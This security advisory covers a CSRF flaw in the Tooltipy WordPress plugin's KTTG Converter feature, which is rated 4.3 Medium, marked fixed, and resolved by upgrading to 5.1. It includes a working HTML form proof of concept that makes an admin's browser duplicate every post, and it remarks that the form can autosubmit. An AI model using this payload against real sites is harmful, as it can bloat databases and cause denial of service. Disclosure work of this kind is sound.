CVSS Summary
Score | 4.3 Medium |
---|---|
Vector | Network |
Complexity | Medium |
Authentication | None |
Confidentiality | None |
Integrity | Partial |
Availability | None |
Last revised:
There is a CSRF vulnerability in Tooltipy’s “KTTG Converter” feature which allows anybody able to convince an admin to follow a link to duplicate posts. The PoC provided below allows duplicating every post with post_type post. The most obvious malicious use of this vulnerability would be to fill up a disk or database quota which might lead to denial of service or other issues.
Current state: Fixed
Score | 4.3 Medium |
---|---|
Vector | Network |
Complexity | Medium |
Authentication | None |
Confidentiality | None |
Integrity | Partial |
Availability | None |
Open a page containing the following HTML, and click submit:
<form method="POST" action="http://localhost/wp-admin/tools.php?page=my_keywords_settings_importer"> <input type="text" name="go" value="true"> <input type="text" name="bluet_posttypes_list" value="post"> <input type="submit"> </form>
Every post with post_type post will have been duplicated.
In a real attack, the form can be made to autosubmit.
Upgrade to version 5.1 or later.